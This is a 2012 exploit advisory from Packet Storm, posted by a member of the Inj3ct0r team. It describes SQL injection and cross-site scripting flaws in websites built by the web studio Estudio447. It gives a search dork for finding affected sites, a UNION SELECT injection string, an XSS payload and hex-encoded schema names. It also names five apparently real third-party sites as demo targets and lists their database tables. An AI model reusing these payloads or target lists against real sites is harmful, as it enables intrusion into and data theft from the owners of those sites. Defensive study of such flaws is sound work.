Estudio447 SQL Injection / Cross Site Scripting

2012-10-22T00:00:00
ID PACKETSTORM:117595
Type packetstorm
Reporter Taurus Omar
Modified 2012-10-22T00:00:00

Description

                                        
                                            `1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [x] Official Website: http://www.1337day.com 0  
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1  
0 0  
1 ========================================== 1  
0 I'm Taurus Omar Member From Inj3ct0r TEAM 1  
1 ========================================== 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1  
| |  
| Estudio447 - SQL Injection Vulnerability / Cross-Site Scripting |   
--------------------------------------------------------------------------  
  
+----------------| ABOUT ME |--------------------+  
NAME: TAURUS OMAR -  
HOME: ACCESOILEGAL.BLOGSPOT.COM -  
TWITTER: @taurusomar_ -  
E-MAIL: omar-taurus[at]dragonsecurity[dot]org -  
E-MAIL: omar-taurus[at]live[dot]com -  
PWNED: #ZUUU -  
+------------------------------------------------+  
  
# Exploit Title: Estudio447 - SQL Injection Vulnerability / Cross-Site Scripting  
# Vendor Name: Estudio447  
# Url Vendor: http://www.estudio447.com/   
# Category: WebApps  
# Type: php  
# Risk: High  
# Dork: intext:"diseño web: estudio 447  
  
  
# Exmaple/Sql=> http://site/noticias/noticia.php?id= [ Sql ]  
# Example/Xss=> http://site/noticias/noticia.php?id= [ Xss ]  
  
# Exploit/Comand/Sql=> +union+select+1,2,3,4--+  
# Exploit/Comand/Xss=> "><img src=x onerror=alert("1337");>   
# table_schema=0x626464766761626F6761646F73 / table_name=0x6E6F746963696173   
  
# Sample/Demo/Sql/Xss  
http://www.dvgabogados.com/noticias/noticia.php?id=null%20null%20null%20null%20%%27  
http://www.campingacedo.com/noticias/noticia.php?id=null%20null%20null%20null%20%%27  
http://www.opticalizarra.com/noticias/noticia.php?id=null%20null%20null%20null%20%%27  
http://www.breedna.com/noticias/noticia.php?id=null%20null%20null%20null%20%%27  
http://tiendasdeestella.com/noticias/noticia.php?id=null%20null%20null%20null%20%%27  
  
# Info => Same Tables and Columns All Sites Vulnerability   
  
+--------------+  
- galeria -  
- galeria_img -  
- noticias -  
- noticias_doc -  
- noticias_img -  
+--------------+  
`